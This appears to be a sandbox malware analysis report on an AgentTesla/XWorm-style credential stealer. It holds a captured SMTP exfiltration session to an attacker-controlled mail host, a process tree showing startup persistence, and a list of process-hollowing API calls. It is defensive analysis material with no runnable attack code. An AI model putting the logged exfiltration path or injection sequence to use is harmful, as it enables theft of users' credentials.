                                                                                Nov 25, 2024 14:48:10.998661041 CET58749757162.254.34.31192.168.2.4250-server1.educt.shop127.0.0.1
                                                                                250-PIPELINING
                                                                                250-SIZE 204800000
                                                                                250-ETRN
                                                                                250-STARTTLS
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-AUTH=PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250-DSN
                                                                                250 CHUNKING
                                                                                Nov 25, 2024 14:48:11.000181913 CET49757587192.168.2.4162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                                Nov 25, 2024 14:48:11.399952888 CET58749757162.254.34.31192.168.2.4334 UGFzc3dvcmQ6
                                                                                Nov 25, 2024 14:48:11.803062916 CET58749757162.254.34.31192.168.2.4235 2.7.0 Authentication successful
                                                                                Nov 25, 2024 14:48:11.803329945 CET49757587192.168.2.4162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                                                Nov 25, 2024 14:48:12.202763081 CET58749757162.254.34.31192.168.2.4250 2.1.0 Ok
                                                                                Nov 25, 2024 14:48:12.205069065 CET49757587192.168.2.4162.254.34.31RCPT TO:<ambro@educt.shop>
                                                                                Nov 25, 2024 14:48:12.605240107 CET58749757162.254.34.31192.168.2.4250 2.1.5 Ok
                                                                                Nov 25, 2024 14:48:12.605396986 CET49757587192.168.2.4162.254.34.31DATA
                                                                                Nov 25, 2024 14:48:13.003722906 CET58749757162.254.34.31192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                                                Nov 25, 2024 14:48:13.004515886 CET49757587192.168.2.4162.254.34.31.
                                                                                Nov 25, 2024 14:48:13.561058044 CET58749757162.254.34.31192.168.2.4250 2.0.0 Ok: queued as 6426276FA5
                                                                                Nov 25, 2024 14:49:22.141817093 CET49743587192.168.2.4162.254.34.31QUIT
                                                                                Nov 25, 2024 14:49:22.543203115 CET58749743162.254.34.31192.168.2.4221 2.0.0 Bye

                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:08:47:20
                                                                                Start date:25/11/2024
                                                                                Path:C:\Users\user\Desktop\Ref#2056119.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\Ref#2056119.exe"
                                                                                Imagebase:0x8e0000
                                                                                File size:545'600 bytes
                                                                                MD5 hash:2C4DB8B396DFF48BA1E6AE44BD9AAE08
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2055273808.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:08:47:36
                                                                                Start date:25/11/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\Liphmahu.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Liphmahu.exe"
                                                                                Imagebase:0x170000
                                                                                File size:545'600 bytes
                                                                                MD5 hash:225F257617CD3A58DB6D4CCC447F48E9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2215628448.0000000006890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:08:47:37
                                                                                Start date:25/11/2024
                                                                                Path:C:\Users\user\Desktop\Ref#2056119.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\Ref#2056119.exe"
                                                                                Imagebase:0xad0000
                                                                                File size:545'600 bytes
                                                                                MD5 hash:2C4DB8B396DFF48BA1E6AE44BD9AAE08
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3115674716.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3115674716.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3115674716.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:6
                                                                                Start time:08:47:47
                                                                                Start date:25/11/2024
                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs"
                                                                                Imagebase:0x7ff753bb0000
                                                                                File size:170'496 bytes
                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:08:47:48
                                                                                Start date:25/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\ishon.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\ishon.exe"
                                                                                Imagebase:0xd70000
                                                                                File size:545'600 bytes
                                                                                MD5 hash:2C4DB8B396DFF48BA1E6AE44BD9AAE08
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 37%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:08:47:53
                                                                                Start date:25/11/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\Liphmahu.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Liphmahu.exe"
                                                                                Imagebase:0x900000
                                                                                File size:545'600 bytes
                                                                                MD5 hash:225F257617CD3A58DB6D4CCC447F48E9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:11
                                                                                Start time:08:47:56
                                                                                Start date:25/11/2024
                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 932
                                                                                Imagebase:0x580000
                                                                                File size:483'680 bytes
                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:12
                                                                                Start time:08:48:04
                                                                                Start date:25/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\ishon.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\ishon.exe"
                                                                                Imagebase:0xaf0000
                                                                                File size:545'600 bytes
                                                                                MD5 hash:2C4DB8B396DFF48BA1E6AE44BD9AAE08
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3116067900.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3116067900.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3116067900.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:10.6%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:1.5%
                                                                                  Total number of Nodes:391
                                                                                  Total number of Limit Nodes:18
                                                                                  execution_graph 67138 714a724 67139 714a72e 67138->67139 67144 715e4c0 67139->67144 67149 715e4f0 67139->67149 67155 715e48f 67139->67155 67140 714a76c 67145 715e4d5 67144->67145 67146 715e4eb 67145->67146 67160 74b1306 67145->67160 67165 74b1a06 67145->67165 67146->67140 67150 715e4ae 67149->67150 67151 715e4fe 67149->67151 67152 715e4eb 67150->67152 67153 74b1306 2 API calls 67150->67153 67154 74b1a06 2 API calls 67150->67154 67152->67140 67153->67152 67154->67152 67156 715e4a5 67155->67156 67157 715e4eb 67156->67157 67158 74b1306 2 API calls 67156->67158 67159 74b1a06 2 API calls 67156->67159 67157->67140 67158->67157 67159->67157 67161 74b1315 67160->67161 67171 74b42d8 67161->67171 67175 74b42cd 67161->67175 67162 74b137b 67166 74b1a10 67165->67166 67167 74b1305 67165->67167 67169 74b42d8 CopyFileA 67167->67169 67170 74b42cd CopyFileA 67167->67170 67168 74b137b 67169->67168 67170->67168 67172 74b432d CopyFileA 67171->67172 67174 74b442f 67172->67174 67174->67162 67176 74b42d8 CopyFileA 67175->67176 67178 74b442f 67176->67178 67178->67162 67179 714abc5 67180 714abcf 67179->67180 67185 74b5af8 67180->67185 67190 74b5b28 67180->67190 67196 74b5ae8 67180->67196 67181 714a50f 67186 74b5b0d 67185->67186 67189 74b5b23 67186->67189 67201 74b5bae 67186->67201 67206 74b5f93 67186->67206 67189->67181 67191 74b5b2e 67190->67191 67192 74b5af4 67190->67192 67193 74b5bae 8 API calls 67192->67193 67194 74b5f93 8 API calls 67192->67194 67195 74b5b23 67192->67195 67193->67195 67194->67195 67195->67181 67197 74b5af8 67196->67197 67198 74b5b23 67197->67198 67199 74b5bae 8 API calls 67197->67199 67200 74b5f93 8 API calls 67197->67200 67198->67181 67199->67198 67200->67198 67202 74b5b95 67201->67202 67203 74b5bb6 67201->67203 67202->67189 67203->67202 67211 74b74b0 67203->67211 67216 74b74a1 67203->67216 67207 74b5fa2 67206->67207 67209 74b74a1 8 API calls 67207->67209 67210 74b74b0 8 API calls 67207->67210 67208 74b5b95 67208->67189 67209->67208 67210->67208 67212 74b74c5 67211->67212 67221 74b7581 67212->67221 67226 74b78d9 67212->67226 67217 74b74b0 67216->67217 67219 74b78d9 8 API calls 67217->67219 67220 74b7581 8 API calls 67217->67220 67218 74b74e7 67218->67202 67219->67218 67220->67218 67222 74b7599 67221->67222 67231 74b7da8 67222->67231 67247 74b7d98 67222->67247 67223 74b756b 67227 74b7580 67226->67227 67228 74b756b 67226->67228 67229 74b7d98 8 API calls 67227->67229 67230 74b7da8 8 API calls 67227->67230 67229->67228 67230->67228 67232 74b7dbd 67231->67232 67264 74b866d 67232->67264 67268 74b8395 67232->67268 67272 74b88b3 67232->67272 67276 74b8871 67232->67276 67282 74b8b7f 67232->67282 67287 74b8c5d 67232->67287 67293 74b82b9 67232->67293 67298 74b8238 67232->67298 67303 74b7f85 67232->67303 67307 74b7f7a 67232->67307 67311 74b86e3 67232->67311 67316 74b9046 67232->67316 67320 74b8529 67232->67320 67233 74b7ddf 67233->67223 67248 74b7da2 67247->67248 67249 74b7d7d 67247->67249 67251 74b8529 WriteProcessMemory 67248->67251 67252 74b866d VirtualAllocEx 67248->67252 67253 74b86e3 2 API calls 67248->67253 67254 74b9046 VirtualAllocEx 67248->67254 67255 74b7f85 WriteProcessMemory 67248->67255 67256 74b7f7a VirtualAllocEx 67248->67256 67257 74b82b9 2 API calls 67248->67257 67258 74b8238 2 API calls 67248->67258 67259 74b8b7f 2 API calls 67248->67259 67260 74b8c5d 2 API calls 67248->67260 67261 74b88b3 VirtualAllocEx 67248->67261 67262 74b8871 2 API calls 67248->67262 67263 74b8395 WriteProcessMemory 67248->67263 67249->67223 67250 74b7ddf 67250->67223 67251->67250 67252->67250 67253->67250 67254->67250 67255->67250 67256->67250 67257->67250 67258->67250 67259->67250 67260->67250 67261->67250 67262->67250 67263->67250 67265 74b88b3 67264->67265 67266 74b9053 67265->67266 67324 717fe10 67265->67324 67269 74b83a4 67268->67269 67328 75bfe68 67269->67328 67273 74b88bd 67272->67273 67273->67272 67274 74b9053 67273->67274 67275 717fe10 VirtualAllocEx 67273->67275 67275->67273 67277 74b7f03 67276->67277 67278 74b8238 67276->67278 67332 715f008 67278->67332 67336 715f002 67278->67336 67279 74b829a 67283 74b8b8e 67282->67283 67340 74bf638 67283->67340 67344 74bf630 67283->67344 67284 74b8bba 67288 74b86e2 67287->67288 67289 74b7f03 67287->67289 67291 74bf638 Wow64SetThreadContext 67288->67291 67292 74bf630 Wow64SetThreadContext 67288->67292 67290 74b871e 67291->67290 67292->67290 67294 74b82d1 67293->67294 67348 74b9578 67294->67348 67353 74b9569 67294->67353 67295 74b82e9 67299 74b8242 67298->67299 67301 715f002 NtResumeThread 67299->67301 67302 715f008 NtResumeThread 67299->67302 67300 74b829a 67301->67300 67302->67300 67304 74b7f94 67303->67304 67306 75bfe68 WriteProcessMemory 67304->67306 67305 74b801d 67305->67233 67306->67305 67308 74b88b3 67307->67308 67309 74b9053 67308->67309 67310 717fe10 VirtualAllocEx 67308->67310 67310->67308 67313 74b86f2 67311->67313 67312 74b871e 67314 74bf638 Wow64SetThreadContext 67313->67314 67315 74bf630 Wow64SetThreadContext 67313->67315 67314->67312 67315->67312 67317 74b9053 67316->67317 67318 74b88b3 67316->67318 67318->67316 67319 717fe10 VirtualAllocEx 67318->67319 67319->67318 67321 74b8538 67320->67321 67323 75bfe68 WriteProcessMemory 67321->67323 67322 74b7f03 67323->67322 67325 717fe50 VirtualAllocEx 67324->67325 67327 717fe8d 67325->67327 67327->67265 67329 75bfeb0 WriteProcessMemory 67328->67329 67331 74b83fa 67329->67331 67331->67233 67333 715f050 NtResumeThread 67332->67333 67335 715f085 67333->67335 67335->67279 67337 715f008 NtResumeThread 67336->67337 67339 715f085 67337->67339 67339->67279 67341 74bf67d Wow64SetThreadContext 67340->67341 67343 74bf6c5 67341->67343 67343->67284 67345 74bf638 Wow64SetThreadContext 67344->67345 67347 74bf6c5 67345->67347 67347->67284 67349 74b958f 67348->67349 67350 74b95b1 67349->67350 67358 74b97f5 67349->67358 67363 74b9874 67349->67363 67350->67295 67354 74b9578 67353->67354 67355 74b95b1 67354->67355 67356 74b97f5 2 API calls 67354->67356 67357 74b9874 2 API calls 67354->67357 67355->67295 67356->67355 67357->67355 67359 74b97fb 67358->67359 67368 74bef28 67359->67368 67372 74bef1d 67359->67372 67364 74b989c 67363->67364 67366 74bef28 CreateProcessA 67364->67366 67367 74bef1d CreateProcessA 67364->67367 67365 74b9fb6 67366->67365 67367->67365 67369 74bef8c CreateProcessA 67368->67369 67371 74bf114 67369->67371 67373 74bef28 CreateProcessA 67372->67373 67375 74bf114 67373->67375 67394 133c5c0 67395 133c606 67394->67395 67396 133c6f3 67395->67396 67399 133cb99 67395->67399 67402 133cba8 67395->67402 67400 133cbd6 67399->67400 67405 133c7d4 67399->67405 67400->67396 67403 133c7d4 DuplicateHandle 67402->67403 67404 133cbd6 67403->67404 67404->67396 67406 133cc10 DuplicateHandle 67405->67406 67407 133cca6 67406->67407 67407->67400 67376 714a8f1 67377 714a8fb 67376->67377 67381 71586c8 67377->67381 67385 71586ba 67377->67385 67378 714a939 67382 71586dd 67381->67382 67389 71587d0 67382->67389 67386 71586c8 67385->67386 67388 71587d0 2 API calls 67386->67388 67387 71586f3 67387->67378 67388->67387 67391 71587f5 67389->67391 67390 71586f3 67390->67378 67391->67390 67392 71594c0 VirtualProtect 67391->67392 67393 71594b8 VirtualProtect 67391->67393 67392->67391 67393->67391 67408 714ab6d 67409 714ab73 67408->67409 67413 7154978 67409->67413 67418 7154968 67409->67418 67410 714abb7 67414 715498d 67413->67414 67423 71549a8 67414->67423 67428 71549b8 67414->67428 67415 71549a3 67415->67410 67419 715498d 67418->67419 67421 71549b8 2 API calls 67419->67421 67422 71549a8 2 API calls 67419->67422 67420 71549a3 67420->67410 67421->67420 67422->67420 67425 71549ad 67423->67425 67424 7154a21 67424->67415 67425->67424 67433 7158428 67425->67433 67437 7158430 67425->67437 67430 71549e2 67428->67430 67429 7154a21 67429->67415 67430->67429 67431 7158430 SleepEx 67430->67431 67432 7158428 SleepEx 67430->67432 67431->67430 67432->67430 67434 7158430 SleepEx 67433->67434 67436 71584ae 67434->67436 67436->67425 67438 7158470 SleepEx 67437->67438 67440 71584ae 67438->67440 67440->67425 66981 70a2180 66982 70a219d 66981->66982 66983 70a21ad 66982->66983 66987 70a97d0 66982->66987 66990 70a9201 66982->66990 66995 70a4379 66982->66995 66999 70af0f8 66987->66999 66991 70ac662 66990->66991 67007 133fd2a 66991->67007 67011 133fd38 66991->67011 66992 70ac686 66996 70a4398 66995->66996 66998 70af0f8 VirtualProtect 66996->66998 66997 70a43bf 66998->66997 67001 70af11f 66999->67001 67003 70af548 67001->67003 67004 70af590 VirtualProtect 67003->67004 67006 70a29df 67004->67006 67008 133fd38 67007->67008 67015 133fd79 67008->67015 67012 133fd4d 67011->67012 67014 133fd79 2 API calls 67012->67014 67013 133fd65 67013->66992 67014->67013 67017 133fdaf 67015->67017 67016 133fd65 67016->66992 67020 133fe89 67017->67020 67024 133fe90 67017->67024 67021 133fe90 VirtualAlloc 67020->67021 67023 133ff0a 67021->67023 67023->67016 67025 133fed0 VirtualAlloc 67024->67025 67027 133ff0a 67025->67027 67027->67016 67028 1334528 67029 1334536 67028->67029 67032 1333cf4 67029->67032 67031 133453f 67033 1333cff 67032->67033 67036 13340d0 67033->67036 67035 1334565 67035->67031 67037 13340db 67036->67037 67040 13340e0 67037->67040 67039 1334605 67039->67035 67041 13340eb 67040->67041 67044 1334214 67041->67044 67043 13346e2 67043->67039 67045 133421f 67044->67045 67048 1334244 67045->67048 67047 13347f4 67047->67043 67049 133424f 67048->67049 67050 1337580 67049->67050 67059 1337828 67049->67059 67064 1335434 67050->67064 67052 13375f0 67054 13377db 67052->67054 67069 133a1f9 67052->67069 67053 1337819 67053->67047 67054->67053 67074 133c2f8 67054->67074 67079 133c2e9 67054->67079 67060 133780d 67059->67060 67061 1337815 67059->67061 67060->67061 67062 133c2e9 3 API calls 67060->67062 67063 133c2f8 3 API calls 67060->67063 67061->67050 67062->67061 67063->67061 67065 133543f 67064->67065 67066 1338dda 67065->67066 67084 1338e29 67065->67084 67088 1338e38 67065->67088 67066->67052 67070 133a1fc 67069->67070 67092 133a21f 67070->67092 67096 133a230 67070->67096 67071 133a20e 67071->67054 67076 133c319 67074->67076 67075 133c33d 67075->67053 67076->67075 67104 133c49b 67076->67104 67108 133c4a8 67076->67108 67080 133c2f4 67079->67080 67081 133c33d 67080->67081 67082 133c49b 3 API calls 67080->67082 67083 133c4a8 3 API calls 67080->67083 67081->67053 67082->67081 67083->67081 67085 1338e7b 67084->67085 67086 1338e86 KiUserCallbackDispatcher 67085->67086 67087 1338eb0 67085->67087 67086->67087 67087->67066 67089 1338e7b 67088->67089 67090 1338eb0 67089->67090 67091 1338e86 KiUserCallbackDispatcher 67089->67091 67090->67066 67091->67090 67093 133a224 67092->67093 67099 133a328 67093->67099 67094 133a23f 67094->67071 67098 133a328 GetModuleHandleW 67096->67098 67097 133a23f 67097->67071 67098->67097 67100 133a35c 67099->67100 67101 133a339 67099->67101 67100->67094 67101->67100 67102 133a560 GetModuleHandleW 67101->67102 67103 133a58d 67102->67103 67103->67094 67105 133c4b5 67104->67105 67107 133c4ef 67105->67107 67112 133b030 67105->67112 67107->67075 67109 133c4b5 67108->67109 67110 133b030 3 API calls 67109->67110 67111 133c4ef 67109->67111 67110->67111 67111->67075 67113 133b03b 67112->67113 67115 133d208 67113->67115 67116 133c834 67113->67116 67115->67115 67117 133c83f 67116->67117 67118 1334244 3 API calls 67117->67118 67119 133d277 67118->67119 67119->67115 67120 714ac38 67121 714ac42 67120->67121 67125 7159800 67121->67125 67129 71597f2 67121->67129 67122 714ac80 67126 7159815 67125->67126 67133 715995c 67126->67133 67130 7159815 67129->67130 67132 715995c 2 API calls 67130->67132 67131 715982b 67131->67122 67132->67131 67134 7159983 67133->67134 67135 715982b 67134->67135 67136 71594c0 VirtualProtect 67134->67136 67137 71594b8 VirtualProtect 67134->67137 67135->67122 67136->67134 67137->67134 67441 714af68 67442 714af6e 67441->67442 67446 74b46b8 67442->67446 67452 74b46a8 67442->67452 67443 714a50f 67447 74b46cd 67446->67447 67458 74b46e8 67447->67458 67465 74b46f8 67447->67465 67472 74b4b9c 67447->67472 67448 74b46e3 67448->67443 67453 74b46b8 67452->67453 67455 74b46e8 4 API calls 67453->67455 67456 74b46f8 4 API calls 67453->67456 67457 74b4b9c 4 API calls 67453->67457 67454 74b46e3 67454->67443 67455->67454 67456->67454 67457->67454 67460 74b46f8 67458->67460 67459 74b477a 67459->67448 67460->67459 67479 74b5508 67460->67479 67483 74b5500 67460->67483 67487 74b506c 67460->67487 67491 74b5078 67460->67491 67467 74b4722 67465->67467 67466 74b477a 67466->67448 67467->67466 67468 74b5078 CreateFileA 67467->67468 67469 74b506c CreateFileA 67467->67469 67470 74b5508 DuplicateHandle 67467->67470 67471 74b5500 DuplicateHandle 67467->67471 67468->67467 67469->67467 67470->67467 67471->67467 67474 74b476b 67472->67474 67473 74b477a 67473->67448 67474->67473 67475 74b5078 CreateFileA 67474->67475 67476 74b506c CreateFileA 67474->67476 67477 74b5508 DuplicateHandle 67474->67477 67478 74b5500 DuplicateHandle 67474->67478 67475->67474 67476->67474 67477->67474 67478->67474 67480 74b5550 DuplicateHandle 67479->67480 67482 74b55a3 67480->67482 67482->67460 67484 74b5508 DuplicateHandle 67483->67484 67486 74b55a3 67484->67486 67486->67460 67488 74b5078 CreateFileA 67487->67488 67490 74b5173 67488->67490 67492 74b50ca CreateFileA 67491->67492 67494 74b5173 67492->67494
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,oq$4$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                  • API String ID: 0-1127353760
                                                                                  • Opcode ID: b3e298a849d183d695d50a42d0c89ca43c148ecda4c08dcc694ccfcfff0adde6
                                                                                  • Instruction ID: 553a00cef6543f03c6d16f9b343216137d3fa555d1bae93fc8f5df14b14fdbe4
                                                                                  • Opcode Fuzzy Hash: b3e298a849d183d695d50a42d0c89ca43c148ecda4c08dcc694ccfcfff0adde6
                                                                                  • Instruction Fuzzy Hash: E4B20BB4A00219CFDB14DF99C994BAEB7B6BF48300F15819AE509AB3A5DB70DD81CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,oq$4$$kq$$kq$$kq$$kq
                                                                                  • API String ID: 0-569362799
                                                                                  • Opcode ID: 52b0c428fc591e34ebf065d569ccfaf5fd5784b64f041d1c1296a386c085beac
                                                                                  • Instruction ID: a103a01417787372c9e5f05395069fec2020a38d3a6e0caa693cf4b8b263723f
                                                                                  • Opcode Fuzzy Hash: 52b0c428fc591e34ebf065d569ccfaf5fd5784b64f041d1c1296a386c085beac
                                                                                  • Instruction Fuzzy Hash: CE22CAB4A00219CFDB24DF65C994BADB7B6FF48300F1582AAD509AB3A5DB709D81CF50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
